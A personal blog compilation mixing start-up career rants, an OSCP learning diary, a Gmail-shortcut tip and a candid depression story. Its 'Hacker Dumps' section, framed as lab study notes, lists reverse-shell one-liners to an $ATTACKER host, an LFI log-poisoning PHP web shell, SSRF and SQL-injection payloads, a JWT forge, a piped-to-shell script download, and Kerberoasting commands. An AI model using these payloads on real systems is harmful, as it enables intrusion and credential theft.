They made changes, did new stuff, but then blamed the workforce for not joining in; people were simply sick of the place and the people. Imagine telling your partner that they never take you out, and they then send YOU a ticket to the cinema – it's not the same. When a company has lost its care for the people, offering time‑restricted, scheduled opportunities to spend time with the execs is not the same as hanging out together. Just a huge disconnect – the heart was gone. It needed a change of leadership, genuine honesty and care, and to regain trust.
So, as you can tell from the past tense, I have left. I was exceedingly loyal and gave chance after chance for the promises I was given to come to fruition, but all of them were, it appears, lies.

There were too many career managers riding a gravy train. If you are unsure what I mean: these are people who manage for the money and are only interested in career progression, the next level and the next pay increase. They are not interested in the company or the people. Generally they have great CVs, having worked for many companies in good positions, always apparently ready for the next challenge. It all falls on its arse when they have to really do the job, and when they meet a company built on a foundation of honesty, they don't like being held to account.

Some had been successful using a manner that was counter to the company values; this was never challenged. There were bullies who were not held to account but had another layer placed under them, and racists who were reported but never sacked, just moved (promoted :O). This caused a huge swathe of leavers, all of whom gave their reasons for leaving, but no action was taken to stem the flood.
As I said, this isn't my first rodeo in a start‑up, and this is a mistake start‑ups make time and time again, until the IPO or takeover, and then it's a slow decline or just a corporate train ride/wreck.
So: no longer nimble, no one to trust, no real career progression. Time to move. I want to work in security, but I don't have the experience, only the desire, and my full‑time role was taking all my time because I still cared about the company. I did still care; I felt a lot of heart there.
I have moved to another start‑up:
Why? Well, because it is at the phase of real care and growth.
Is it security? Well, no and maybe. It is at the point where everyone has every job, so it does include security and could grow to a full‑time role. Even if it doesn't, I'm finding this a challenge and really enjoying it.
Now, I'm so much happier. I have space to learn, experience and grow.
This blog is going to have to change as I'm not concentrating on security. I'm at present concentrating on Kubernetes and tools around it; I'm now in the GCP world and AI.
I'll get back to security, and I hope to start enjoying the learning as opposed to feeling it is a bind I need to chase to get away from the hell‑hole I was in and be a career choice. Looking forward: if I take the role of security here, I will organically gain experience, but I'm happier than I've ever been. Even the imposter syndrome is edging away a bit.
Well, I'll hopefully be back to more regular updates, and they may cover other subjects, but it's all important. K8s, Helm, KEDA, GitLab CI: it's all stuff that needs securing, and understanding as much as possible matters. Just like a dev: learn one language well and you can turn your hand to others more easily.
Well it's been months, how's it going!
Not well
My training: slow progress, steady growth
Venturing into the world of cyber security is exciting and challenging. For someone like me it's daunting, and I can see the level of knowledge I don't have (no Dunning–Kruger here, matey).
My pursuit of training has been met with a reality check – progress is slow, but the baby steps I make are undeniably rewarding.
Firstly, I delved into platforms like Hack The Box and TryHackMe, enticed by promises of hands‑on experience and real‑world simulations. The allure of solving challenges and honing my skills was irresistible. Yet, as I immersed myself in these virtual environments, I quickly realised that it's far from easy, as expected, but even with walkthroughs it's slow going.
Trying to understand the processes and methods is really fun but very slow, and I have this inbuilt feeling that I'm too slow, that time is running out to start the career. But I need real‑world knowledge.
As said, it's fun and brings into use lots of bits from the cyber sec modules at university. The programming done at uni now needs pulling from the rear of my mind back to the front. All very exciting, and each small step feels like one step nearer to mastery (still not confident). Some of the skills I'm picking up make me look at things in a different manner – like perusing website input boxes as a place for manipulation and a weak point.
TryHackMe has been great; it has presented me with lots of machines, each presenting unique obstacles to overcome. Concepts that seemed straightforward on paper have, in practice, baffled me. In exploiting vulnerabilities, I found myself grappling with networking protocols, cryptography, and other principles, building the complexity as we go. Each step has needed patience and ultimately a walkthrough, but I can feel the confidence building as I look at the attack surfaces and have some skills to at least start to look for issues before tapping out.
THM has offered a guided approach, with structured learning paths and interactive tutorials, yet some of the boxes have had me scratching my head for hours. But with each step, each success is a huge level of satisfaction that adds to my determination to continue.
I've also reached out to some online groups and events to find some support. The cyber security genre is daunting and so far has pushed me away. I do feel there is a wish to be open, but there are a lot of people that are chasing money over the passion – that may be the issue.
In the events and communities, those at the leading edge speak with such passion and, when you walk away from this to the general workforce, there are many just giving the industry a bad rap.
Joining local meetups and online forums exposed me to a wealth of knowledge and expertise, but also highlighted the breadth of the field and the daunting task of keeping pace with its rapid evolution. Conversations with seasoned professionals served as both inspiration and humbling reminders of how much I have yet to learn. The seasoned people, when you get to speak to them, are welcoming; further down, though, Dunning–Kruger really kicks in: people with less knowledge shouting louder to appear clever and to push away anyone who might find them out, just as in other areas of the tech industry.
I'm slowly seeing each troubled step as a lesson, teaching me resilience and fortitude. I think I'm getting easier with the slow pace of my journey, recognising that deep knowledge can't be rushed. As I continue my training, I am reminded of a quote by Bruce Lee:
“I fear not the man who has practised 10,000 kicks once, but I fear the man who has practised one kick 10,000 times.”
I hope it's not about how quickly I progress, but rather the depth of understanding and expertise I cultivate along the way.
So, to my fellow aspiring hackers facing similar struggles, I offer this advice: embrace the journey, celebrate the victories, and learn from the defeats. Rome wasn't built in a day, and neither is a master hacker. Slow progress is still progress, and with perseverance, we will reach our destination.
A person is not judged by how many times they are knocked down, but how many times they get up to keep fighting on. OSCP seems a long way away but I will get there; I just might jump on the HTB cert first.
Now I need two more docs to level up the three columns.
Hacking my way to OSCP!
Not another wannabe hacker!
Learning hacking and pursuing the OSCP certification
So, another moron thinking they could be a HACKER. As someone passionate about digital security, I've decided to pursue a career and follow along on an exciting journey into the world of ethical hacking.
My ultimate goal? Attaining the Offensive Security Certified Professional (OSCP) certification.
I'm going to write up my notes and you can follow me on this adventure into cybersecurity, its challenges, and my pursuit of knowledge.
Introduction
My intentions are purely ethical (honest guvnor).
I covered cyber security at university and so this is the next step for me. I love digital forensics, started down the route of reverse engineering, played with some other areas but, as with most uni modules, they are quick and high‑level.
It's now time to break away from my present area of tech and follow what I really wish to be doing. The genre is wide, as wide as any area of tech. I'd like to hit offensive / red team.
Why learn hacking?
Learning hacking isn't just about gaining unauthorised access to systems; it's about understanding how they work and how to secure them. With the increasing frequency and sophistication of cyber‑attacks, ethical hackers play a pivotal role in safeguarding digital landscapes.
I'd like to be part of that fight‑back, keep people safe and learn.
Getting started
To kick‑start my journey, I'm diving into the basics of networking, operating systems, and programming languages. Understanding the foundations is key to becoming a proficient ethical hacker.
I have signed up to the TryHackMe website. It's not cheap but I believe you do need to invest and back yourself at times. I have possibly made a mistake as all guidance seems to point at Hack The Box, but you work with what you have. Security wasn't part of the company I work at when I started, so changing direction is hard, but I have made my intentions clear and have company backing to scratch my itch (as long as I keep doing my existing job).
Learning resources
A couple of books I've been advised to look at:
Books
- Hacking: The Art of Exploitation by Jon Erickson
- Metasploit: The Penetration Tester's Guide by David Kennedy
Online platforms
Utilise platforms like:
- Hack The Box
- TryHackMe
- OverTheWire
for hands‑on practice.
Building practical skills
Theory is essential, but practical experience is where the real learning happens. I plan to immerse myself in real‑world scenarios, honing my skills through simulated environments and challenges.
As said, TryHackMe is my go‑to as we speak. I have a life, so have limited free‑time (I work to live). I really wish to just enjoy work (as best you can).
Preparing for OSCP
The Offensive Security Certified Professional (OSCP) is a respected certification in the cybersecurity field. To prepare, I'll be dedicating time to THM and then the OSCP syllabus, engaging in labs, and working on vulnerable machines to develop the practical skills required for the exam.
Challenges and rewards
Undoubtedly, this journey will be challenging. Hurdles will emerge, and problem‑solving skills will be put to the test. Yet, the satisfaction of overcoming challenges and contributing to a safer digital world makes it all worthwhile.
Conclusion
As I document my progress, struggles, and victories, I will be smashing my notes on the THM pathways here. I invite you to join me on this learning adventure. Whether you're a seasoned professional or a fellow enthusiast, your insights and support are invaluable. Together, let's explore the exciting and ever‑evolving field of ethical hacking.
Stay tuned for updates, and let's hack responsibly! 💻🔒
Hacking my notes on my way to OSCP!
Hacker Dumps!
Living Notes on the Way to OSCP
This is a running dump — the muscle-memory commands, the quick-reference patterns, and the “I’ve forgotten how to do X for the third time” cheats I keep coming back to while training for OSCP and adjacent labs. Less essay, more lab notebook. I’ll keep adding as I learn.
For the longer-form companion thinking, see The Race to OSCP. For where to actually practise this stuff safely, Building a Home Lab to Learn Hacking Without Going to Jail. For the writeup discipline, How To Write a CTF Writeup That’s Actually Worth Reading.
Recon: The First Twenty Minutes
The full TCP and UDP sweep that catches what most people miss:
# fast TCP across all ports
sudo nmap -p- --min-rate 5000 -T4 -oN nmap-fast.txt $TARGET
# extract open ports for the targeted service scan
PORTS=$(grep '^[0-9]' nmap-fast.txt | cut -d/ -f1 | tr '\n' , | sed 's/,$//')
# version + default scripts on what's actually open
sudo nmap -sCV -p$PORTS -oN nmap-services.txt $TARGET
# top UDP ports — slow, run it in another tmux pane
sudo nmap -sU --top-ports 200 -oN nmap-udp.txt $TARGET
Web fuzzing baseline:
ffuf -u http://$TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -mc 200,204,301,302,403
ffuf -u http://$TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt -e .php,.txt,.bak,.zip
ffuf -H "Host: FUZZ.$TARGET" -u http://$TARGET -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fc 404
SMB/RPC enumeration on Windows-flavoured boxes:
crackmapexec smb $TARGET --shares
enum4linux-ng -A $TARGET
nxc smb $TARGET -u '' -p '' --users
Web App Bug Patterns I Always Forget
SQL injection — the manual sanity check before sqlmap:
' → server error / different response = candidate
' OR '1'='1 → true-condition test
' UNION SELECT NULL -- → adjust NULL count until no error
Then sqlmap -u "$URL" --batch --risk=2 --level=3 only after you’ve confirmed the candidate manually. Lab only.
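The decision behind that manual sanity check can be written down as plain logic. A tiny sketch (looks_injectable is a made-up name, and real pages vary more than exact string equality allows, so treat the comparison as illustrative):

```python
def looks_injectable(baseline: str, true_resp: str, false_resp: str) -> bool:
    # Boolean-based heuristic: an always-true condition (' OR '1'='1)
    # should render like the normal page, while an always-false one
    # (' AND '1'='2) should differ. Anything else is inconclusive.
    return true_resp == baseline and false_resp != baseline

# worked example with canned responses
normal = "<h1>Welcome back, alice</h1>"
print(looks_injectable(normal, normal, "<h1>No such user</h1>"))  # True: candidate
print(looks_injectable(normal, normal, normal))                   # False: inconclusive
```

In practice you compare response lengths or a stripped body rather than exact strings, but the logic is the same.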
Local file inclusion to RCE (the log-poisoning route):
?file=../../../../var/log/apache2/access.log
# poison the log:
curl http://target/ -A "<?php system(\$_GET['c']); ?>"
# trigger:
?file=../../../../var/log/apache2/access.log&c=id
SSRF starter payloads to test:
http://127.0.0.1:80/
http://localhost:8080/
http://169.254.169.254/latest/meta-data/ # AWS IMDSv1
file:///etc/passwd
gopher://127.0.0.1:6379/_INFO # Redis if reachable
JWT mischief (the full pattern in Auth, OAuth, and JWTs: How They Work and How Attackers Break Them):
# alg:none forge
python3 -c "import jwt; print(jwt.encode({'sub':'admin','role':'admin'}, '', algorithm='none'))"
# brute weak HMAC
hashcat -a 0 -m 16500 token.txt /usr/share/wordlists/rockyou.txt
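To see why the alg:none forge works at all, it helps to build one by hand. A stdlib-only sketch (forge_none_token is my name for illustration, not a real library call); lab use only:

```python
import base64
import json

def b64url(data: bytes) -> str:
    # JWT segments are unpadded base64url
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def forge_none_token(claims: dict) -> str:
    # With alg "none" the third (signature) segment is empty;
    # a vulnerable verifier accepts the token without any signature check.
    header = b64url(json.dumps({"alg": "none", "typ": "JWT"}).encode())
    payload = b64url(json.dumps(claims).encode())
    return header + "." + payload + "."

print(forge_none_token({"sub": "admin", "role": "admin"}))
```

The tell in the wild is a token that still has two dots but nothing after the second one.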
Linux Privesc One-Liners
The boring-but-essential checks, in order:
# kernel + distro version (then check exploit-db)
uname -a && cat /etc/os-release
# sudo without a password?
sudo -l
# SUID binaries that aren't standard (cross-reference GTFOBins)
find / -perm -4000 -type f 2>/dev/null | grep -vE '^/(usr|bin|sbin)/(s?bin/)?(passwd|chsh|chfn|gpasswd|newgrp|mount|umount|su|sudo|pkexec|fusermount)$'
# writable cron jobs / paths
ls -la /etc/cron* /var/spool/cron/ 2>/dev/null
find / -path /proc -prune -o -writable -type f -print 2>/dev/null | grep -E 'cron|init|systemd'
# capabilities the kernel might give you (cap_setuid is a winner)
getcap -r / 2>/dev/null
# all-in-one
curl -s https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/linPEAS/linpeas.sh | sh
Always read GTFOBins for any unusual binary you find SUID. Half the boxes are won there.
Windows Privesc One-Liners
# basic enumeration
whoami /priv
whoami /groups
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
# unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
# AlwaysInstallElevated check (rare but devastating when set)
reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# heavy lifting
.\winPEAS.exe
For AD-joined boxes, the BloodHound + Impacket workflow lives in the Home Lab post.
Reverse Shells That Actually Work
The cheats where I always forget which flag goes where — remember to have a listener (nc -lvnp 4444) running on the attacker box first:
# Linux bash
bash -c "bash -i >& /dev/tcp/$ATTACKER/4444 0>&1"
# Linux Python (when bash is broken)
python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("'$ATTACKER'",4444));[os.dup2(s.fileno(),f) for f in (0,1,2)];pty.spawn("/bin/bash")'
# Windows PowerShell
powershell -nop -c "$c=New-Object Net.Sockets.TCPClient('$ATTACKER',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$x=(iex $d 2>&1|Out-String);$x2=$x+'PS '+(pwd).Path+'> ';$s.Write([Text.Encoding]::ASCII.GetBytes($x2),0,$x2.Length);$s.Flush()};$c.Close()"
Upgrade a dumb shell to a proper TTY (the post-RCE classic):
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Ctrl-Z to background
stty raw -echo; fg
export TERM=xterm
# resize the term to match your local
stty rows 50 cols 200
Kerberoasting Quick Reference
# from the attacker box, with valid domain creds (Impacket)
GetUserSPNs.py -dc-ip $DC -request -outputfile spns.txt 'DOMAIN.LOCAL/user:password'
# crack the TGS
hashcat -a 0 -m 13100 spns.txt /usr/share/wordlists/rockyou.txt
AS-REP roasting (for users with DONT_REQ_PREAUTH):
GetNPUsers.py -dc-ip $DC -no-pass -usersfile users.txt 'DOMAIN.LOCAL/'
hashcat -a 0 -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
Reference Links I Keep Coming Back To
- Cheatsheets — HackTricks, PayloadsAllTheThings, HighOn.Coffee, GTFOBins, LOLBAS.
- Wordlists — SecLists. Already in /usr/share/seclists/ on Kali.
- Local privesc enumeration — PEASS-ng (linPEAS / winPEAS).
- AD attacks — Impacket, BloodHound.
- Web — PortSwigger Web Security Academy — the best free training in the field, full stop.
- Practice platforms — TryHackMe SOC L1 + Jr Pen Tester, HTB Academy, OffSec Proving Grounds, PortSwigger Academy.
Final Thought
OSCP — and any hands-on cert — rewards reps and methodology, not memorisation. Every box runs the same general loop: enumerate exhaustively, identify candidates, exploit one, get a foothold, enumerate again, escalate. The commands above are the muscle-memory bits; the methodology and the writeup discipline (see How To Write a CTF Writeup) are what turn reps into skill.
These notes get updated as I find better one-liners. If you spot something out of date or have a better way to do any of the above, let me know.
The race to IPO
The tech start-up, a poisoned and crazy journey
The Perils of Start-up Life: A Personal Perspective
While the allure of going public may seem like the pinnacle of success, the reality often unveils a different story.
My journey has led me through the treacherous landscape of start-ups aiming for the coveted Initial Public Offering (IPO). The reality is a tale of trials and tribulations that can jeopardise the very core of a company, and the human toll is devastating.
The Initial Dream
In its infancy, a start-up is a collective of passionate minds, driven by innovation and a shared vision to disrupt industries. Part of this dream is that you may witness the metamorphosis into a publicly traded entity, reaping the collective rewards of tireless dedication. However, the path to an IPO is fraught with challenges, and the toll it takes on the individuals within the company is often overlooked.
The Funding Conundrum
Start-ups, in their pursuit of IPO, frequently find themselves entangled in a complex web of venture capitalists, angel investors, and institutional funding. The relentless pressure to meet valuation targets and attract investors can result in compromises that not only undermine the very ethos of the start-up but also lead to the loss of valued team members along the way.
The Sacrifice of Innovation
As the focus shifts from innovation to meeting financial milestones, start-ups may inadvertently sacrifice the essence of what made them unique. The relentless pursuit of profit margins and shareholder value can stifle creativity, hindering the very innovation that propelled the company into the limelight.
The Shattered Togetherness
Start-ups are celebrated for their dynamic and close‑knit cultures. However, the quest for an IPO strains these bonds, transforming the once‑familial atmosphere into a rigid corporate structure. The loss of togetherness is palpable, leaving employees feeling detached from the company's initial vision and from each other.
Greed takes over and the vultures sail in. The people that created this unicorn are pushed aside for those that have travelled the IPO course, those with a laser focus on the IPO goal. They have no values, they are not part of the company, they are here to benefit themselves only. They will not be here after IPO as they take their chunk from the work others have given and leave the shattered shell of this once great place. Those that stayed, who endured the long hard road, are left to look at the remains and try to resuscitate it.
I know from experience, it will never reach the lofty heights again. It will have the meat taken from the bones. I've been through this all before and remained to see the slow death. It may remain in name, it may shape‑shift, but it will never be the peacock it once was.
I know of a few companies that have held steadfast to their values. They remain great places to be and generally stay private or get bought and then ruined (unless an equally great place merges – rare).
Many will get rich financially but they are rotten to the core and poor inside.
The Human Cost of Meeting Expectations
The run to an IPO initiates a Sisyphean race against time. Start-ups grapple with the demands of scaling operations, ensuring profitability, and complying with regulations. The pressure to meet the expectations of shareholders and analysts can lead to rushed decisions, resulting in the loss of both talented individuals and the core values that defined the company.
There is the build‑up of teams and the business, then the cash‑out and lay‑off to colour the books, lives wrecked as the values disappear, as the greed takes over and the once trusted leaders turn their backs on the loyal teams. True colours show and it is ugly.
There isn't the building of a great company anymore, but an illusion to sell to a fickle market: smoke and mirrors, an illusion of profitability from a company that was really built with x number of people but now runs on a skeleton of an over‑worked, under‑paid, hurt workforce that is not sustainable long term.
This is a tale that is old, but no one bucks the trend; cyclic behaviour and greed is what we have.
Conclusion
I've witnessed firsthand the human toll of the pursuit of an IPO and the shattered remains that exist after. The initial dream of creating something extraordinary often gives way to the erosion of togetherness, the loss of valued team members, and the compromise of the very values that defined the company.
It's crucial for founders and stakeholders alike to navigate this journey with caution, ensuring that the very essence of the start-up isn't lost amidst the chaos. They may get rich, but think: is this hollow person who you really set out to be? Is this the legacy you wish to have? Is this the type of values you would like to be applied to your children? Would you treat them as such?
When you are seeing resources over people, is this who you set out to be?
In the grand tapestry of start‑up life, the cost of an IPO should never be measured solely in financial terms. The true tragedy lies in the loss of the human connection, the disintegration of shared values, and the collective spirit that once defined the start‑up's identity.
Be true to you, live a proud life.
Well it went wrong big time! NSFW
Well if you don't work, you can't F*CK UP!
So, you've made a BIG mistake?
There are little mistakes made each day that go unnoticed but every now and again a bigger one is made. So what do you do?
Well, if you are that person who sits back and rides the coat‑tails of others, pops a helpful line into Slack and walks away as an incident is in progress, just points out what is only known with hindsight… fuck you.
These are those that like to get noticed for being helpful! You can't really say “fuck off, you are being an arse”, as “what? I was just helping” is the reply, but we all know what you are up to.
I was asked on an FLT course a long time ago – “if you crash into a door, what do you do?”. Everyone said you ensure the area is safe, ensure you park the vehicle in a safe place, exit the vehicle in a safe manner, ensure the damage is reported… blah blah blah…
The instructor said NO!!! You will quickly look around to see if anyone has seen you. It is human nature. It is no different in tech.
There are little mistakes made each day that go unnoticed but every now and again a bigger one is made. So what do you do?
What you should do and what you do are different. You WILL try to fix it quickly. What you should do is inform everyone as soon as you are aware.
My advice in life has always been: tell the truth. People will respect you more, will trust you more and it is so much easier to live as you do not have to remember the lies.
What do you think your peers would prefer though:
- OMG I've F'ed up and I will need to fix it, OR
- I did F up but I fixed it so we are good.
I suspect the latter BUT that all depends on time and pressure.
If the issue is seen, then questions will be asked so immediate declaration is best. If your peers don't like being spooked for no reason then a quick fix is best.
So what should you do
I go with a small time frame. If you F up big‑time, collect the issue, the possible solutions and, if possible, rectify – but if you can't, declare NOW.
I don't know whether that is the best solution but that is what I'd prefer if I was the one getting the news:
- I've made this issue
- It is due to this
- I've tried this
- I believe this will fix the issue
But won't that damage my rep?
Yes.
There you go. That is it.
Honestly, those that do not make mistakes are either liars or lazy (or have great PR).
If you are working hard and pushing the limits, things will happen – that is tech – and testing and trying new things is the way we get better.
It's all about how you handle it. If you have made this mistake three times then maybe you should ask yourself a question or two, because you can be assured your boss will. BUT, if you have a logical reason why you took an approach, can show you did what you thought was right, and you stick around to fix the issue…
Well, you are a good engineer and one I'd be happy to work beside. Dust yourself off, learn from that lesson.
So who will (does) piss you off
Now I will add that with 20/20 vision – that is hindsight – some of those safety blankets you made, some of your decisions, may not in the cold light of day hold up to scrutiny and fold like an origami frog BUT you had them and you have learned a lesson on how not to do it and so have improved.
So why the rant in the first paragraph?
Well there are plenty of people who enjoy others' misfortune. They are scum but they are there. They are not helping but looking for their own glory.
Imagine, you have created a huge script, spent days perfecting it, adding output to indicate errors, monitored it, tweaking it and then it runs on the live system… BOOM. It doesn't behave as expected but, due to your hard work, the output identifies the issue, the safety blanket you put in place means that it can be remedied quickly but it will mean the issue does affect a number of people temporarily. So, here we go.
Type 1:
“Hey, I've seen this error!!!” – and they are happy to back off while it is fixed, even extending the offer privately of help if needed.
These people are great. Admittedly their mood may change and they may become a little less patient if the fix drags on, yet they understand that a big issue will not be helped by them getting gnarly.
Type 2:
“Hey, I've seen this error,” and they start to tell you how inconvenient it is to them and how safeties should have been in place and the roll‑back system should be more robust and that they will need to escalate this up the next couple of levels…
Actually, they are right and that will all be in the lessons learned and how we incrementally improve systems BUT – fuck off.
It's not the right time – what are they playing at?
Are they helping? NO. Are they trying to express how hard they are working and how important they are… again – fuck off.
Type 3:
“Oh, I see you have an issue, if you'd have done x or y this wouldn't have happened, just offering this for the future.”
Not now, dickhead, you are not helping and are sidetracking the fix but yeah:
- thanks
- yeah, you've got your name out there as knowing lots – albeit on an issue after it occurred, rather than before it occurred, back when we were actually working on the thing.
Type 4:
“If you need help I'm here!!!” … you reach out and they are nowhere to be seen.
Well done, you got your name in there… jerk.
Type 5:
“Shit, I'd love to help but I have a family emergency.”
Odd that these only occur when there is an issue!!! But you got your name on the list for people to see…
Type 6:
“Hey, @manager1, 2 and 3 – the issue Geeky is having, I've found the cause and here is the solution.”
Thanks, but why not be a team player, offer the help to those fixing the issue as opposed to the managers.
Good managers know instinctively that you are a no‑good arsehole but you may fall lucky and find a sucker.
You are an arse and the scourge of any industry; nobody likes you nor trusts you. You know those close colleagues you have? They are keeping their enemies closer, that is all.
I can list lots more but my advice to you is: privately offer help, be patient. That's it, it's not hard.
Advice and moan over :D
I need a Gmail app on my desktop!
Ah, you can make one in a few clicks!
Need a Google app?
I was looking for a Gmail app. I was astounded that there isn't one.
You can use email apps, but what if there was a simpler solution?
This is quick :P
Here we go
You are going to need to have Chrome installed – booooo!
I know it's not always the first choice, but it is handy to have a second browser so you can check issues.
So:
- Open Chrome and go to your Google Mail (Gmail).
- In the menu bar find the three vertical dots (near your boat race in the top right).
- Click on the icon.
- Go to “More tools” (changed by Google – now use “Save and Share”).
- Click “Create shortcut”.
- In the window that pops up:
- Enter a name for your shortcut and ensure that you tick the box for “Open as window”.
- Click “Create”.
Locate the created Gmail icon, click, and now you have a Gmail app :D
On the Mac you can set it up to open on login and stay in the dock – right‑click and select the options.
There you go, quite a quick one.
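Under the hood, that shortcut is just Chrome launched in “app mode”. If you prefer the terminal, something like this does the same job – note the binary name is an assumption that depends on your install (it may be google-chrome-stable or chromium on Linux):

```shell
# Linux: open Gmail in its own app-style window (no tabs or address bar)
google-chrome --app="https://mail.google.com"

# macOS equivalent (the --args part only takes effect if Chrome
# is not already running)
open -a "Google Chrome" --args --app="https://mail.google.com"
```

Handy if you want to script a whole set of “apps” rather than clicking through the menu each time.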
Mental State
Yeah, everybody has an issue!
No-one said this blog was just tech!
Well, everybody is depressed, aren't they??
Is mental health a bandwagon that has become fashionable? It is a shame that it can be seen this way. Fed up, down in the dumps, a bit sad – all are moods, but they are not depression.
Looking for a description (not mine) -
Depression is a serious mental health condition, characterised by persistent feelings of sadness, hopelessness, and a loss or lack of interest in activities. Depression can be caused by many factors, including genetics, life events, and chemical imbalances of the brain.
Symptoms include:
- Feeling persistently sad or empty
- Loss of interest
- Sleep disturbances, insomnia or oversleeping
- Fatigue or lack of energy
- Change of appetite
- Change of weight
- Difficulty concentrating, making decisions, or remembering things
- Feelings of worthlessness, guilt, or helplessness
- Thoughts of death or suicide
- A feeling of “what's the point?”
Depression can be treated with a combination of therapy, medication, and lifestyle changes. Therapy, such as cognitive-behavioural therapy or talk therapy, can help individuals identify negative thought patterns and develop coping mechanisms. Medication, such as antidepressants, can help correct chemical imbalances in the brain. Lifestyle changes, such as exercise, healthy eating, and stress reduction, can also be helpful in managing depression.
If you or someone you know is struggling with depression, it is important to seek help from a healthcare professional. Depression is a treatable condition, and with the right support and resources, individuals can recover and live fulfilling lives.
A little like a star sign, we can all get it to fit
Those symptoms could fit anyone, couldn't they? Tired a lot? Yeah, could be depression… or you could be drinking a lot, overworking, or sleeping on a bad mattress. Feel worthless? Could be depression… or your partner is a bad person, or you are grieving a recent loss. There are lots of reasons.
So, Yeah I have depression
I've heard this so many times.
- “I suffer from depression!!!!”
- “Oh, when were you diagnosed?”
And when I hear:
- “Oh, I self-diagnosed”
I'm like – what, I beg your pardon!!!!
- “Why are you being an arse and so rude?”
- “It's my autism, I can't help it”…
Shut up. People who have autism aren't arseholes!!! You're just being a dick and looking for an excuse.
I've heard this with all the “trendy” terms/issues we have these days
- Autism
- Gender issues
- Dyslexia
- Asperger
- the list goes on…..
Believe me, I have empathy for genuine cases but everybody seems to be looking for an issue, an excuse for something.
If you genuinely have any of these issues or concerns, you need to see a professional.
So, I have been diagnosed – and it's not the first time – and here I will tell you my story (some parts are redacted for privacy etc., but I hope this will help if you are in a similar situation).
How did I find out
When I was younger, early 20s, I found out.
I used to be, as a child, quite withdrawn and quiet. I won't cover it here, but my childhood kinda sucked. By the age of around 14, though, I was kinda happy with me. I'd got to a point where I enjoyed being nice.
I found I could smile at an old lady on the bus and this would make her smile. This made me happy and being nice made me feel good.
I was still a quiet person and felt my life was pre-planned due to my social surroundings – it was just to be like all the others around the local area, and that was fine.
I took an apprenticeship and it went, in hindsight, as it generally does for a young, non-worldly-wise man – just OK, but I was happy.
I had done a lot of growing between 18 and 20 (felt like a long time then), I gained a lot of confidence. I realised I could take on anything, speak to anyone etc.
Then it all starts going wrong.
I've always been quite trusting and had taken a job where I made a good friend. We would spend dinners together, laugh a lot, talked about our partners, advised each other and we were to grow in the workplace and life together.
Promotion came and they turned. They lied about many things, and this got me in trouble at work and demoted. I was so hurt and didn't know how to take it.
I'd also lost my outside-of-work best friend: they had found a partner who took a shine to me and made inappropriate asks of me. I told my friend of these comments and somehow I was the bad one?
It was all going a bit shit. My life was folding in on itself. I felt I had no-one to reach out to, felt such a disappointment to my family; I had lost control.
I met a new person and we connected. This was a bad decision and I knew it. It wasn't the set up I was meant to connect with, it wasnt the plan my mother had but it felt good.
They were in a shitty space, I was in a shitty space. We could sit and talk for hours about anything.
I eventually told my mother, and this was the start of a whole collapse of my relationship with her; things were just getting worse.
I'm missing chunks out – like my partner's children hating me, and being overlooked for promotions – but ultimately I went to the doctors to talk about a medical condition, and it turned out that I was suffering from what was then referred to as a complete mental breakdown (this is not a term you can use now :D).
They advised me to take a break from everything and take some strong tranquilizers. I told my mother, and she said, “Get a grip and don't tell anyone at work.” It would have been career suicide to say this at that time, and so I got a grip, took a two-week holiday, threw the pills in the bin, painted on a smile, and never spoke of the demons again.
Honestly, I wanted to die. Yeah – weak, running away, the coward's way out… these are the terms used and the thoughts people have.
How easy would it be, no more pain, no more sadness, no more loneliness.
Why did I stay? Because my partner made me feel special and made me laugh, and because of one of my partner's children – a little girl who doted on me. She really loved me, I felt like I was her world, and we giggled a lot… I couldn't do it to her.
Now I can skip a lot as it was grey. I was never the same person. I had to wrestle each day just to get through, I became a passenger in life with those around me dictating what I did, how, where etc. I had moments of the old me where I would run with a little confidence but it would last days at most. I became unkind to myself and numb to life.
I was scarred and it was never going away. So many times I thought about dying, but that would only help me, only take my ache away – when I love, I love deep, and I never wanted to hurt others.
So how do I describe the feeling of depression? Imagine you tied a bungee rope to your back and started running. It would be easy at first and then… it gets tighter and harder. Eventually – boing – you get pulled back into the dark pit (depression).
That is how my life was but it became a comfortable pain. It became an evil buddy. I felt that I wouldn't be me without it.
Now, we had a child. If you have children, you will know the feeling of oh my god, I am the rock this thing leans on FOREVER.
I started to feel trapped in life, just working to keep my family. At times I had some happiness, but the monster of depression ruins every part of your life.
- You have a kid? – What happens if I die?
- You are happy? – That means I'm gonna be sad when this period ends.
- You do a good job? – That means this is the new baseline and is always expected.
Every positive is a negative and it is exhausting.
So, things fell to shit big time when the company I worked for got sold. I had done well and had FINALLY found a happy place. I was happy at home, I loved my job, loved my teammates, and the pay was good. See – every time it's good, it means my life is gonna be shit and go downhill.
I took a chance and I went to Uni… I smashed it out of the park but guess what, imposter syndrome and depression are cruel.
The pressure was immense but the time was great. I became something like the person I wanted to be but by now, no one needs me.
The children are grown up, and my wife is not interested. This is probably because things in life had changed, and I had changed – and without talking, you ain't gonna know where people are mentally/emotionally.
Some of this sounds uncoordinated, but that is the mindset, like a ping pong ball in the mind.
So what now? I get a job in a cutting-edge tech company, and it is very different from my old life – a huge personal change. These new workspaces are very different from my old space, and openness is a thing.
I found I am really good at advising others, and found that I was a good listener. I was speaking to a workmate one day, and they were telling me about their depression, when out of the blue he said, “Do you take medication for your depression?” OMG. I had never spoken of my issues, so I was taken aback – and that made a crack in the dam.
Times had changed and it was easier to be open, but old habits die hard and I couldn't tell people of my struggles. As far as I was concerned, it's embarrassing to be weak emotionally (my perception).
Oops
One day I was talking to a medical professional on behalf of my son and inquired about mental health therapy that was advertised and I had a brief moment of feeling happy to speak about being fed up with feeling low.
I immediately regretted it and became embarrassed. I had issues from my childhood, issues from my teens, issues long after, all had been greyed out and hidden away but I also really felt that there was no point in life.
